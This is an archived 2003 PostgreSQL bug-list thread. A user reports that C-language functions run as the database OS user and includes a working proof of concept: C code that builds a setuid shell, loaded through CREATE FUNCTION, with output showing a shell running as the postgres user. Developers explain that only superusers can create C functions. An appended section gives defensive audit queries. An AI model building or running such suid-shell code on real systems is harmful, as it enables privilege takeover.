Lists: | pgsql-bugs |
---|
From: | Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> |
---|---|
To: | pgsql-bugs(at)postgresql(dot)org |
Subject: | "Bug" report - Serious (local shell) |
Date: | 2003-08-14 18:07:42 |
Message-ID: | 20030814150742.6457e853.linke@calnet.com.br |
============================================================================
POSTGRESQL BUG REPORT TEMPLATE
============================================================================
Your name : Diego Linke
Your email address : gamk(at)gamk(dot)com(dot)br
System Configuration
---------------------
Architecture (example: Intel Pentium) : Intel
Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE
PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
Compiler used (example: gcc 2.95.2) : 2.95.3 20010315
Please enter a FULL description of your problem:
------------------------------------------------
The problem is that PostgreSQL, when it calls a function in external C, calls it as the postgres user.
A bad user will be able to create a binary with a suid shell for the postgres user, and to assume control of postgres (pg_hba.conf, bases, postmaster, in short everything that the postgres user can do).
I presume that this problem exists in all versions of postgres. :p
See this example:
(work/ttyp2:/tmp/ja_era)> id
uid=1000(gamk) gid=100(users) groups=100(users),0(wheel),5(operator)
(work/ttyp2:/tmp/ja_era)> id pgsql
uid=1001(pgsql) gid=1000(pgsql) groups=1000(pgsql)
(work/ttyp2:/tmp/ja_era)> cat supg.c
main() {
setuid(1001);
setgid(1000);
system("/bin/sh");
}
(work/ttyp2:/tmp/ja_era)> cat func.c
#include <stdlib.h>
int execute(int x) {
system("gcc -o /tmp/ja_era/supg /tmp/ja_era/supg.c");
system("chmod a+x /tmp/ja_era/supg");
system("chmod u+s /tmp/ja_era/supg");
return(x+1);
}
(work/ttyp2:/tmp/ja_era)> cc -c -fpic func.c
(work/ttyp2:/tmp/ja_era)> cc -o func.so -shared func.o
(work/ttyp2:/tmp/ja_era)> psql teste
Welcome to psql 7.3.2, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit
teste=# CREATE FUNCTION execute (integer) RETURNS integer AS '/tmp/ja_era/func.so' LANGUAGE C;
CREATE FUNCTION
teste=# SELECT execute(5);
execute
---------
6
(1 row)
teste=# \q
(work/ttyp2:/tmp/ja_era)> ls -l supg
-rws--x--x 1 pgsql wheel 6029 Aug 14 08:41 supg*
(work/ttyp2:/tmp/ja_era)> ./supg
$ whoami
pgsql
$ id
uid=1000(gamk) euid=1001(pgsql) gid=100(users) groups=100(users),0(wheel),5(operator)
$ touch /tmp/teste
$ ls -l /tmp/teste
-rw-r--r-- 1 pgsql wheel 0 Aug 14 08:42 /tmp/teste
$
--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk(at)gamk(dot)com(dot)br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464
From: | Stephan Szabo <sszabo(at)megazone(dot)bigpanda(dot)com> |
---|---|
To: | Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> |
Cc: | <pgsql-bugs(at)postgresql(dot)org> |
Subject: | Re: "Bug" report - Serious (local shell) |
Date: | 2003-08-14 18:46:47 |
Message-ID: | 20030814114242.A90183-100000@megazone.bigpanda.com |
On Thu, 14 Aug 2003, Diego Linke - GAMK wrote:
> Your name : Diego Linke
> Your email address : gamk(at)gamk(dot)com(dot)br
>
> System Configuration
> ---------------------
> Architecture (example: Intel Pentium) : Intel
>
> Operating System (example: Linux 2.0.26 ELF) : NetBSD 1.6.1_STABLE
>
> PostgreSQL version (example: PostgreSQL-7.3.2): PostgreSQL-7.3.2
>
> Compiler used (example: gcc 2.95.2) : 2.95.3 20010315
>
> Please enter a FULL description of your problem:
> ------------------------------------------------
>
> The problem is that PostgreSQL, when it calls a function in external C,
> calls it as the postgres user.
> A bad user will be able to create a binary with a suid shell for the
> postgres user, and to assume control of postgres (pg_hba.conf,
> bases, postmaster, in short everything that the postgres user can
> do).
Only a bad database superuser should be able to do anything of the sort
because normal users shouldn't be allowed to use CREATE FUNCTION with C
language functions (it's untrusted), are you seeing something different?
From: | Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us> |
---|---|
To: | Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> |
Cc: | pgsql-bugs(at)postgresql(dot)org |
Subject: | Re: "Bug" report - Serious (local shell) |
Date: | 2003-08-14 19:22:43 |
Message-ID: | 6915.1060888963@sss.pgh.pa.us |
Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> writes:
> The problem is that PostgreSQL, when it calls a function in external C,
> calls it as the postgres user.
The ability to create C functions is reserved to superusers, for exactly
this reason. If you have the rights to make the backend execute
arbitrary C code, you hardly need a shell to do something nasty.
In short, this is not a bug. Don't give superuser privileges to people
you cannot trust.
regards, tom lane
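An audit for the situation discussed in the replies above, added here as an example and not part of the original thread: it lists which roles hold superuser rights (and so can create C functions) and which C functions load a library from outside the server's own library directory, as '/tmp/ja_era/func.so' in the report does. It assumes a current PostgreSQL release, where the pg_roles view exists and pg_proc.probin is a text column; the 7.3 catalogs in the report differ.

```sql
-- Added example (not from the thread). Assumes a current PostgreSQL
-- release; run as a superuser or a role that can read these catalogs.

-- 1. Roles that can create C-language functions: superusers only.
--    Every name listed here can run arbitrary code as the server's OS user.
SELECT rolname, rolcanlogin
FROM pg_roles
WHERE rolsuper
ORDER BY rolname;

-- 2. Languages and whether each is trusted. 'c' and 'internal' are
--    untrusted (lanpltrusted = false), so only superusers may create
--    functions in them.
SELECT lanname, lanpltrusted, lanacl
FROM pg_language
ORDER BY lanname;

-- 3. C functions whose shared library is not under $libdir.
--    Extension-provided functions normally show '$libdir/<name>';
--    an absolute path such as a world-writable temp directory
--    deserves a closer look.
SELECT n.nspname  AS schema_name,
       p.proname  AS function_name,
       p.probin   AS library_path,
       p.prosrc   AS link_symbol,
       r.rolname  AS owner
FROM pg_proc p
JOIN pg_language  l ON l.oid = p.prolang
JOIN pg_namespace n ON n.oid = p.pronamespace
JOIN pg_roles     r ON r.oid = p.proowner
WHERE l.lanname = 'c'
  AND p.probin NOT LIKE '$libdir/%'
ORDER BY p.probin, n.nspname, p.proname;
```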
From: | Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> |
---|---|
To: | Diego Linke - GAMK <linke(at)calnet(dot)com(dot)br> |
Cc: | pgsql-bugs(at)postgresql(dot)org |
Subject: | Re: "Bug" report - Serious (local shell) |
Date: | 2003-08-14 20:03:59 |
Message-ID: | 20030814170359.495a807b.linke@calnet.com.br |
Hi Stephan,
>
> Only a bad database superuser should be able to do anything of the sort
> because normal users shouldn't be allowed to use CREATE FUNCTION with C
> language functions (it's untrusted), are you seeing something different?
>
I am sorry!
I really did not perceive that only an administrator could create functions in C.
Thanks for all.
--
[ Diego Linke - GAMK ]
System/Network/Security Administrator
E-Mail/Site: gamk(at)gamk(dot)com(dot)br - http://www.gamk.com.br
Public Key: http://www.gamk.com.br/gamk.asc
Phone Number: (+5541) 9967-3464